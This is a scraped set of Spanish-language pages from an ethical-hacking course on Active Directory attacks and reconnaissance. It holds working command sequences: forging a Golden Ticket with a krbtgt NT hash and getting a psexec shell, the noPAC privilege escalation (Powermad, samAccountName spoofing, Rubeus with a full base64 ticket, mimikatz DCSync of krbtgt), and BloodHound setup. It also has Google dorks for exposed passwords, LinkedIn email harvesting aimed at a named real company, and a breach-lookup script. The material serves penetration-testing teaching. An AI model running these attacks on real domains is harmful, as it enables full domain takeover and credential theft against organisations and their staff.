al KALI Copy ┌──(root㉿kali)-[~] └─# impacket-smbserver Share $(pwd) -smb2support //En el AD C:\Windows\test> copy golden.kirbi \\192.168.4.128\Share\golden.kirbi * Transferir el archivo golden.kirbi y MIMIKATZ a un cliente con Windows10. * Se utiliza el GOLDEN TICKET. * También se puede utilizar la herramienta TICKETER para usar el GOLDEN TICKET. Copy ┌──(root㉿kali)-[~] └─# /usr/share/doc/python3-impacket/examples/ticketer.py -nthash 733b7a2ead01888656f52d23826b0dba -domain-sid S-1-5-21-1181767541-559474198-1654905306 -domain enterprise.com Administrator Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Creating basic skeleton ticket and PAC Infos [*] Customizing ticket for enterprise.com/Administrator [*] PAC_LOGON_INFO [*] PAC_CLIENT_INFO_TYPE [*] EncTicketPart [*] EncAsRepPart [*] Signing/Encrypting final ticket [*] PAC_SERVER_CHECKSUM [*] PAC_PRIVSVR_CHECKSUM [*] EncTicketPart [*] EncASRepPart [*] Saving ticket in Administrator.ccache * Creamos una variable que se llame KRB5CCNAME Copy ┌──(root㉿kali)-[~] └─# export KRB5CCNAME="/root/Administrator.ccache" * Accedenis a los recursos sin credenciales Copy ┌──(root㉿kali)-[~] └─# impacket-psexec -n -k enterprise.com/Administrator@AD-ENTERPRISE cmd.exe Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Requesting shares on AD-ENTERPRISE..... [*] Found writable share ADMIN$ [*] Uploading file xVJmebyV.exe [*] Opening SVCManager on AD-ENTERPRISE..... [*] Creating service AHyY on AD-ENTERPRISE..... [*] Starting service AHyY..... [!] Press help for extra shell commands Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32> importante: Se debe modificar el archivo /etc/hosts para que apunte a la IP de enterprise.com ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F2tblXQw8uem5iSUjtCne%252Fimage.png%3Falt%3Dmedia%26token%3D4070dd1b-0606-423a-832e-ae68d69000c1&width=768&dpr=4&quality=100&sign=b3358bd7&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FQA3Y58cKLplGy37bqIOT%252Fimage.png%3Falt%3Dmedia%26token%3D6717f9bd-4ea5-4e3c-9d54-ff84d79c347a&width=768&dpr=4&quality=100&sign=ee6101cb&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252Fgn6vePNM95uGBLmMuCmZ%252Fimage.png%3Falt%3Dmedia%26token%3D249898d9-da8a-48a0-bd07-355fe45d0c92&width=768&dpr=4&quality=100&sign=d22ccaa7&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F48gaFD3aIJEs9adz4K1t%252Fimage.png%3Falt%3Dmedia%26token%3D2bee14b9-dd64-46f6-b394-c42a0a2c50f9&width=768&dpr=4&quality=100&sign=11a44fa0&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FcxMC5fjVp7sxDDibthBm%252Fimage.png%3Falt%3Dmedia%26token%3Dc903edfc-b482-4c75-b4fc-c9fcb3da4527&width=768&dpr=4&quality=100&sign=52850351&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FzdLjMvkKMpWz8xV8Hh4h%252Fimage.png%3Falt%3Dmedia%26token%3Dfdd05930-b4d2-49dd-af2d-b09d16e0c7a2&width=768&dpr=4&quality=100&sign=89272569&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FZWFsluoRgRgIHRq0LSfU%252Fimage.png%3Falt%3Dmedia%26token%3D83efcd3e-5d2c-4eea-a794-50c042ce69a1&width=768&dpr=4&quality=100&sign=de542975&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FcXi2EEC409ZLpipbcoXi%252Fimage.png%3Falt%3Dmedia%26token%3Daac76d97-e1b6-4aa7-85ce-8343bc20e0dc&width=768&dpr=4&quality=100&sign=681b3362&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F2CSVScKAUpQRoPSgHbLs%252Fimage.png%3Falt%3Dmedia%26token%3D1a529d91-b075-4dc3-b6ef-d0fb0859907a&width=768&dpr=4&quality=100&sign=891bfdcb&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FJJzS6CSvfqpqcqIJIyxa%252Fimage.png%3Falt%3Dmedia%26token%3Ded83ea49-10db-4d61-a602-d914308aec6b&width=768&dpr=4&quality=100&sign=6cea6c16&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FfyhyjAXg4BtQOHS8dZNX%252Fimage.png%3Falt%3Dmedia%26token%3D47fb9d0b-e344-43a7-a4b4-d51e1f215c24&width=768&dpr=4&quality=100&sign=909a441d&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FaiaXtWMBVJ3EwN1kPHUR%252Fimage.png%3Falt%3Dmedia%26token%3Dce6c504f-47f5-4aa4-866c-fc7108fca098&width=768&dpr=4&quality=100&sign=45863dd7&sv=2) --- # noPAC Attack | EH - Infraestructura [PreviousGolden Ticket](/ethical-infraestructura/golden-ticket) [NextDCShadow Attack](/ethical-infraestructura/dcshadow-attack) Last updated 4 months ago [](#id-1.-introduccion) 1\. Introducción --------------------------------------------- * NOPAC es un ataque conocido también como SamAccountName spoofing. * La vulnerabilidad fue descubierta en 2021 y afecta a versiones de Windows Server que no están actualizadas. Microsoft la identificó como CVE-2021-42287 y CVE-2021-42278. * Es un ataque de elevación de privilegios. [](#id-2.-grafica-y-flujo-del-ataque) 2\. Gráfica y Flujo del Ataque ------------------------------------------------------------------------- **Datos Importantes**: * Se requiere un usuario básico de dominio para el ataque. * Un usuario básico de dominio tiene privilegios para crear 10 cuentas de computador. [](#id-3.-comandos-de-automatizacion) 3\. Comandos de automatización ------------------------------------------------------------------------- ### [](#id-3.1.-identificacion-de-la-vulnerabilidad) 3.1. Identificación de la vulnerabilidad Copy /home/kali # nxc smb 192.168.5.100 -u rburga -p 'Passw0rd2027' -M nopac root@kali SMB 192.168.5.100 445 WIN-5UL7A982B9B [*] Windows Server 2016 Standard 14393 x64 (name:WIN-5UL7A982B9B) (domain:enterprise.com) (signing:True) (SMBv1:True) SMB 192.168.5.100 445 WIN-5UL7A982B9B [+] enterprise.com\rburga:Passw0rd2027 NOPAC 192.168.5.100 445 WIN-5UL7A982B9B TGT with PAC size 1514 NOPAC 192.168.5.100 445 WIN-5UL7A982B9B TGT without PAC size 717 NOPAC 192.168.5.100 445 WIN-5UL7A982B9B NOPAC 192.168.5.100 445 WIN-5UL7A982B9B VULNERABLE NOPAC 192.168.5.100 445 WIN-5UL7A982B9B Next step: https://github.com/Ridter/noPac ### [](#id-3.2.-explotacion-de-la-vulnerabilidad) 3.2. Explotación de la Vulnerabilidad Copy python noPac.py enterprise.com/rburga:'Passw0rd2027' -dc-ip 192.168.5.100 -dc-host WIN-5UL7A982B9B -shell --impersonate administrator **Herramienta**: [](#id-4.-ejecucion-paso-a-paso) 4\. Ejecución paso a paso --------------------------------------------------------------- **Requisitos:** Se requiere utilizar POWERMAD: 1. **Crear una cuenta de computador** Copy New-MachineAccount -MachineAccount "KunakLab" -Domain "enterprise.com" -DomainController "WIN-5UL7A982B9B.enterprise.com" **Contraseña**: Password1 1. **Limpiar el SPN** Copy PS C:\Temp\PowerSploit-master\PowerSploit-master> set-DomainObject "CN=KunakLab,CN=Computers,DC=enterprise,DC=com" -Clear "serviceprincipalname" 1. **Cambiar el SAMAccountName por el nombre del DC** Copy Set-MachineAccountAttribute -MachineAccount "KunakLab" -Value "WIN-5UL7A982B9B" -Attribute "samaccountname" 1. **Solicitar el TGT** Copy .\Rubeus.exe asktgt /user:"WIN-5UL7A982B9B" /password:"Password1" /domain:"enterprise.com" /dc:"WIN-5UL7A982B9B.enterprise.com" /nowrap 1. **Cambiar SAMAccountName por el original** Copy Set-MachineAccountAttribute -MachineAccount "KunakLab" -Value "KunakLab$" -Attribute "samaccountname" 1. **Obtener el TGS** Copy .\Rubeus.exe s4u /self /impersonateuser:"Administrator" /altservice:"cifs/WIN-5UL7A982B9B.enterprise.com" /dc:"WIN-5UL7A982B9B.enterprise.com" /ptt /ticket:doIFXDCCBVigAwIBBaEDAgEWooIEZDCCBGBhggRcMIIEWKADAgEFoRAbDkVOVEVSUFJJU0UuQ09NoiMwIaADAgECoRowGBsGa3JidGd0Gw5lbnRlcnByaXNlLmNvbaOCBBgwggQUoAMCARKhAwIBAqKCBAYEggQCmhKIO/P9/+gsxyoLCHqFLTRp4H4qcGewCqlMnyV4pZ+z4+3cVnovJeBWdkvMiRxWfhIpmTLMUSdr0YSzGKaOG3COZAtByYXRPByaBr1C+ALmwxkayQa5TsU1zc9OVjcCJOvd+6x5/cR4XTx1KoMQp34epKoXiOr36rcxit1XHmxZoMsz6gUo8iUQsiuUGScs0/Up3bgQgmjurCV/rdlXeijX+lmRwyh8onFhcDuW05UVOZEUxNj3paJnKpUW+NxtnijKsK7RogD5NBFiOuVxeroJs+gqrGF44CdlJEPOhRv5llT1XFhTYnZi4Jx9xLoA6onG8Oi8OezUMVTEAvQPlPXWaylnnYn+uSADkvxXewhpPqQFbJEfdPt2MbWBBFFDAnEX0V2ZXSEwrUJeKVY0KAFJNLZrGP9mXNkvBaBvChJhtd90geIc3obT3/baxd65gjptGEefmrw2AMWZKGMmdZnhFnXDCz2wqwytSqxfyOmza/Dz9EIny9MBAjK06y7ZS65rK0UEywMtevjQ3Xm6o84mDpma4DU1ASSA2tFmrLyJ7TNz0Rn3HqqlNcTXgC9EBCH8EPlqzV8g50AZR6aqPI7kB5r2fmrDizgGoCaRefd4B2XbwIwzWtn3nCXu20EkQ0b7JOdXF2y3C9aCxkAq5HFVJ/MR8ylw3EJNEwkMFByhtINJ/yAmVDWg2EjhsXgzf1v+Xf0lkgTL1wnzQrtEnDLNnKqmAg9Hdj4MX6yajE5jkuFhkE9BEq5L2iJxFWXD54ge3i9lgZoc7rLzy0QlShW0zwLfCcThvg0TpJb0SJbnCsak8eRjx6eOQ9xb4bGzQVt4b9ohiJ4CcLIIfp3QayqPmxXPmnMBxme4hSlfVLr/UDrPFlMNhuQf4PqvdUG8MsknGsPZ2UslrQdHNS6CdNLgP2uqbmpeMzjaUaEIaMJN45gJSvTg2khd4wthBvj3gST0QEEQ37q8J23UVg02Ae4E1eSDjcKTZ+J4z68uLNeTC5moUv81LkqlC+7hiBEj8Q6tHYpYO1sQJHKK5lPCRlFuIEWjcjR72vdIhBTTgZhYMbJwsi0hTwmXwoSejo1czv1tWnj3AB8kSg/d8EKxq26cICevUC4lboIdYqZwfCtLgPg+nq0CabwGPa1yg9f11FM1Q2ixP2h6fovUCE5Vz7ah+q1CvcJXZ9nqSZbw+l+gCRJQ9xKA8rXe41gXopO1cDe4gRBAFQgvsDVTDDfXPE8hqgN7CJh5NYoH/yzn2fPXVrqHF9YGZaSR3D45PDx+A7AMAz642t0fS/DWYao9JqWYFYzfkMBYGja5Hl63RczesgRbs9jLpogq12BCFoU6dC5/PMBC+VYl4mV6vQ+2A6oIo4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagGzAZoAMCARehEgQQNWxucZbmOpiDs0QKdNIlR6EQGw5FTlRFUlBSSVNFLkNPTaIcMBqgAwIBAaETMBEbD1dJTi01VUw3QTk4MkI5QqMHAwUAQOEAAKURGA8yMDI0MTEwNTA0NTMyNFqmERgPMjAyNDExMDUxNDUzMjRapxEYDzIwMjQxMTEyMDQ1MzI0WqgQGw5FTlRFUlBSSVNFLkNPTakjMCGgAwIBAqEaMBgbBmtyYnRndBsOZW50ZXJwcmlzZS5jb20= 1. **Obtener acceso** Copy lsadump::dcsync /domain:enterprise.com /kdc:WIN-5UL7A982B9B.enterprise.com /user:krbtgt [](#id-5.-referencias) 5\. Referencias ------------------------------------------- [375KB\ \ nopac.jpg\ \ image](https://3741330946-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FKX3Vc1QrEuNFDUSnFFhR%2Fuploads%2FGqhYAwEPWPKqpWQkmJQn%2Fnopac.jpg?alt=media&token=215a3268-234a-4d73-acf1-6ed4780b4b06) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F2REMEYxEbpJ8EwGa1B7L%252Fnopac.jpg%3Falt%3Dmedia%26token%3D4ef28753-200b-4eb9-b381-dabee5ca24e9&width=768&dpr=4&quality=100&sign=207196a0&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FjHdE3tBFqQeQLKSP7YJP%252Fimage.png%3Falt%3Dmedia%26token%3D3b9bb01d-d5bc-4c28-835c-6ba3f36a85da&width=768&dpr=4&quality=100&sign=2d8a3250&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FRZcuBCTzNOZXM15kVsRI%252Fimage.png%3Falt%3Dmedia%26token%3D5a728751-9e08-4353-857f-cd079ea13a50&width=768&dpr=4&quality=100&sign=3e4efd45&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F6JLCxY45HOG4kOqw2riV%252Fnopac.jpg%3Falt%3Dmedia%26token%3D2baf28a6-93b8-491c-9521-25246b41bf21&width=768&dpr=4&quality=100&sign=aca4d318&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FMnV2vjuQd0qNtYbwlkuE%252Fimage.png%3Falt%3Dmedia%26token%3D7f0cc38f-911b-4b3d-885d-018da4da6cb3&width=768&dpr=4&quality=100&sign=21b0be06&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FqFN1CQgzersMat1vxgF4%252Fimage.png%3Falt%3Dmedia%26token%3De13aea83-794c-4724-849d-c853db2b14eb&width=768&dpr=4&quality=100&sign=e9fcedf9&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FaoStEHU247Rvjizt8mTo%252Fimage.png%3Falt%3Dmedia%26token%3D8322351d-48e9-4bc5-bf8f-d0b635e2856d&width=768&dpr=4&quality=100&sign=699423be&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FZ3Wi240D2NtZXYghPABf%252Fimage.png%3Falt%3Dmedia%26token%3Dabe52146-e4c9-403e-81c3-6eaccf0fd602&width=768&dpr=4&quality=100&sign=f69b1fef&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FoaNK9tFnDuvsz2J3IgtA%252Fimage.png%3Falt%3Dmedia%26token%3D14efd109-abb2-4dd4-827f-0030e2ea3f43&width=768&dpr=4&quality=100&sign=e61addbd&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F8Aw2RyXlkhFAh7s1ujNr%252Fimage.png%3Falt%3Dmedia%26token%3D7950e002-09f1-490b-820f-103888c911b2&width=768&dpr=4&quality=100&sign=57e7032f&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FFSlS58XAiijKBdqDDqDe%252Fimage.png%3Falt%3Dmedia%26token%3Da9a781a5-cebf-42c6-a2ae-2680995c34fd&width=768&dpr=4&quality=100&sign=a4b21dc1&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FSUtLBWyYWt7iIMEu1yu2%252Fimage.png%3Falt%3Dmedia%26token%3D1dce23a8-fb26-4343-97ad-0ef529c7cbc2&width=768&dpr=4&quality=100&sign=6c3ab84f&sv=2) [![Logo](https://github.com/fluidicon.png)GitHub - Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain userGitHub](https://github.com/Ridter/noPac) [![Logo](https://github.com/fluidicon.png)GitHub - Kevin-Robertson/Powermad: PowerShell MachineAccountQuota and DNS exploit toolsGitHub](https://github.com/Kevin-Robertson/Powermad) [![Logo](https://github.com/fluidicon.png)GitHub - r3motecontrol/Ghostpack-CompiledBinaries: Compiled Binaries for Ghostpack (.NET v4.0)GitHub](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries) [![Logo](https://security.packt.com/wp-content/uploads/2024/02/cropped-1-192x192.png)noPac Vulnerability   - Packt SecProPackt SecPro](https://security.packt.com/nopac-vulnerability/) [![Logo](https://content.secureworks.com/favicon/apple-touch-icon.png?v=01-14-2022)noPac: A Tale of Two Vulnerabilities That Could End in Ransomware](https://www.secureworks.com/blog/nopac-a-tale-of-two-vulnerabilities-that-could-end-in-ransomware) --- # Enumeración en AD | EH - Infraestructura [PreviousDCSync Attack](/ethical-infraestructura/dcsync-attack) [NextAbuse DNSADMIN Group](/ethical-infraestructura/abuse-dnsadmin-group) Last updated 1 year ago [](#objetivo) Objetivo --------------------------- Mostrar los diferentes mecanismos que tenemos para poder listar información en un Directorio Activo que puede permitir elevar privilegios. [](#herramientas) Herramientas ----------------------------------- ### [](#bloodhound) BloodHound Instalación y Configuración: Copy ┌──(root㉿kali)-[~/TOOLS] └─# pip3 install bloodhound ┌──(root㉿kali)-[~/TOOLS] └─# neo4j console Accedemos desde la web: http://localhost:7474/browser/ Usuario y pass por defecto: neo4j Colocamos la nueva contraseña * Iniciamos BloodHound Copy ┌──(root㉿kali)-[~] └─# bloodhound [![Logo](https://github.com/fluidicon.png)GitHub - BloodHoundAD/BloodHound: Six Degrees of Domain AdminGitHub](https://github.com/BloodHoundAD/BloodHound) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252Fzga61sT0UJG1qWIhyHWf%252Fimage.png%3Falt%3Dmedia%26token%3D94f76eae-91af-4e11-b17d-5d04772c8038&width=768&dpr=4&quality=100&sign=d224707f&sv=2) --- # Reconocimiento | EH - Infraestructura **Concepto**: Es la etapa del proceso de ETHICAL HACKING donde investiga o identifica toda la información de una organización (TARGET). * RECONOCIMIENTO PASIVO No existe contacto con la organización. Se realizan búsquedas en fuentes públicas, blogs, repositorios públicos, etc. * RECONOCIMIENTO ACTIVO Se tiene contacto contacto con la organización. Ejemplos: 1. Ingeniería Social: Llamadas telefónicas 2. Acceso Físico: Visitar físicamente la organización [](#actividades-clasicas-de-reconocimiento) Actividades Clásicas de Reconocimiento --------------------------------------------------------------------------------------- * Escaneo de los puertos TCP|UDP de IPs publicas ¿cuales son las IPs públicas? --> NO * Buscar en recipientes credenciales de acceso --> OK * Analisis de vulnerabilidad de las aplicaciones web publicas ¿Cuáles son las APPs web de la organización? --> NO * Averiguar los encargados del área de Seguridad --> OK * Averiguar TODOS los empleados de la organización --> OK * Campaña de phishing --> NO * Ingeniería Social * Averiguar TODOS los empleados de la organización y su cargo. --> OK * Identificar subdominios y dominios --> OK ¿Cual es el dominio de la PONTIFICA UNIV. CATOLICA DEL PERU? \* pucp.edu.pe \* pucp.pe * Identificar el SERVIDOR DE CORREO ELECTRÓNICO de la organización: GMAIL? OFFICE365? OWA? ZIMBRA? --> OK * Rangos de direcciones IP públicas --> OK * Identificar señal WIFI de la organización --> OK [](#identificar-sub-dominios) Identificar SUB-DOMINIOS ----------------------------------------------------------- **Objetivo**: Identificar las páginas web y direcciones IP para la etapa de ESCANEO. * Portales de Ayuda: * Herramientas de ayuda: [](#identificar-el-servidor-de-correo-electronico) Identificar el Servidor de Correo Electrónico ----------------------------------------------------------------------------------------------------- ### [](#consultas-dns) Consultas DNS Hay registros del servidor DNS: * MX: Identificar el servidor de correo de un DOMINIO * TXT: muestra múltiples PROTOCOLOS. Nos interesa el protocolo SPF. * NS: El servidor DNS que resuelve el NOMBRE * SOA: Indica quien tiene la autoridad sobre el DOMINIO. * A: cambia una IP a dominio Herramientas: * NSLOOKUP * DIG ### [](#analisis-de-las-cabeceras-smtp) Análisis de las cabeceras SMTP Analizar el resultado de una cabecera de correo electrónico. [](#identificar-empleados-de-una-organizacion) Identificar Empleados de una Organización --------------------------------------------------------------------------------------------- Objetivo: Identificar objetivos para el proceso de ATAQUE. Por ejemplo: ataques de ingeniería Social, Ataques de CRACKING ONLINE, Acceso al Correo Electrónico, etc. Fuente: Linkedin, Portal Web de la Organización ### [](#busqueda-de-empleados-en-linkedin-a-traves-de-google) Búsqueda de empleados en Linkedin a través de Google Copy git clone https://github.com/m8sec/crosslinked cd crosslinked python3 setup.py install python3 crosslinked.py -f '{f}{last}@bembos.com.pe' -t 15 -j 2 'Bembos' cat names.txt [](#google-hacking) Google Hacking --------------------------------------- **Concepto**: Es la búsqueda estructurada en Google utilizando OPERADORES para identificar errores/información sensible de organizaciones. ### [](#operadores) Operadores: * INTITLE: Buscar información en el título * INURL: Buscar información en la URL * INTEXT: Buscar información en el TEXTO. * ALLINTITLE * ALLINURL * ALLINTEXT * FILETYPE / EXT: Buscar archivos con ciertas extensiones * SITE: Buscar información en un dominio específico * (-): Retirar resultados de la búsqueda * (\*): comodín para buscar toda la información * DATERANGE: Buscar por la fecha de INDEXACIÓN * (""): Búsquedas exactas **Google DORK**: Es la mezcla de operadores de Google Hacking para identificar vulnerabilidades/debilidades. Ejemplos: intitle:"index of" site:.com.pe site:.pe ext:sql intitle:"index of" backup site:.pe site:.pe ext:txt password ext:pdf site:.pe "la contraseña por defecto" [](#busqueda-en-github) Búsqueda en GITHUB ----------------------------------------------- Concepto: Buscar código fuente y credenciales en repositorios de código fuente. [](#busqueda-en-shodan) Búsqueda en SHODAN ----------------------------------------------- **Concepto**: Buscador de dispositivos y direcciones IP públicas. Sirve por ejemplo: * Servidores en Internet * Dispositivos de Comunicaciones * Cámaras web * Vulnerabilidades en dispositivos **Operadores**: * COUNTRY * PORT * NET * OS * HOSTNAME * VULN: Buscar vulnerabilidades, restringido a tipo de cuentas por ejemplo cuentas EDUCATIVAS. [](#doxing) DOXING ----------------------- **Concepto**: Es buscar toda la información pública de una "activo". ### [](#busqueda-de-credenciales-expuestas) Búsqueda de Credenciales Expuestas [](#busqueda-de-credenciales-de-data-breach) Búsqueda de credenciales de Data Breach ----------------------------------------------------------------------------------------- Copy /import requests import json import subprocess from time import sleep useragent = {'User-Agent': 'pwnedOrNot', 'hibp-api-key': 'API KEY'} parametros = {'truncateResponse': 'false'} archivo = "correos.txt" if __name__ == "__main__" : with open(archivo, "r") as f: lineas = f.readlines() for correo in lineas: correo = correo.strip() max_intentos= 3 for intento in range(max_intentos) : try: r = requests.get(f"https://haveibeenpwned.com/api/v3/breachedaccount/{correo}",headers=useragent,params=parametros,timeout=10) break except: if intento < max_intentos : pass else: print("La página no esta respondiendo") if r.status_code == 200 : respuesta = r.content.decode('utf-8', 'ignore') respuesta_json = json.loads(respuesta) for elemento in respuesta_json: print(correo + ":" + elemento['Name'] + ":" + elemento['BreachDate']) elif r.status_code == 429 : print("Vas muy rapido mi Kin con cara de Kon") while r.status_code == 429 : sleep(1) for intento in range(max_intentos) : try: r = requests.get(f"https://haveibeenpwned.com/api/v3/breachedaccount/{correo}",headers=useragent,params=parametros,timeout=10) break except: if intento < max_intentos : pass else: print("La página no esta respondiendo") if r.status_code == 200 : respuesta = r.content.decode('utf-8', 'ignore') respuesta_json = json.loads(respuesta) for elemento in respuesta_json: print(correo + ":" + elemento['Name'] + ":" + elemento['BreachDate']) elif r.status_code == 400 : print(f"El formato de la cuenta {correo} no es el adecuado") elif r.status_code == 401 : print("La API Key no es válida") else: pass sleep(1) [PreviousConfiguración](/ethical-infraestructura/metodologia/configuracion) [NextEscaneo](/ethical-infraestructura/escaneo) Last updated 1 year ago [https://dnsdumpster.com/dnsdumpster.com](https://dnsdumpster.com/) [https://searchdns.netcraft.com/](https://searchdns.netcraft.com/) [![Logo](https://pentest-tools.com/apple-touch-icon.png)Free subdomain finder online 🛡️ find subdomains of domainPentest-Tools.com](https://pentest-tools.com/information-gathering/find-subdomains-of-domain) [https://securitytrails.com/securitytrails.com](https://securitytrails.com/) [![Logo](https://github.com/fluidicon.png)GitHub - aboul3la/Sublist3r: Fast subdomains enumeration tool for penetration testersGitHub](https://github.com/aboul3la/Sublist3r) [![Logo](https://github.com/fluidicon.png)GitHub - laramies/theHarvester: E-mails, subdomains and names Harvester - OSINTGitHub](https://github.com/laramies/theHarvester) [![Logo](https://github.com/fluidicon.png)GitHub - ffuf/ffuf: Fast web fuzzer written in GoGitHub](https://github.com/ffuf/ffuf) [![Logo](https://mxtoolbox.com/favicon.ico)Email Header Analyzer, RFC822 Parser - MxToolboxMxToolbox](https://mxtoolbox.com/EmailHeaders.aspx) [2KB\ \ 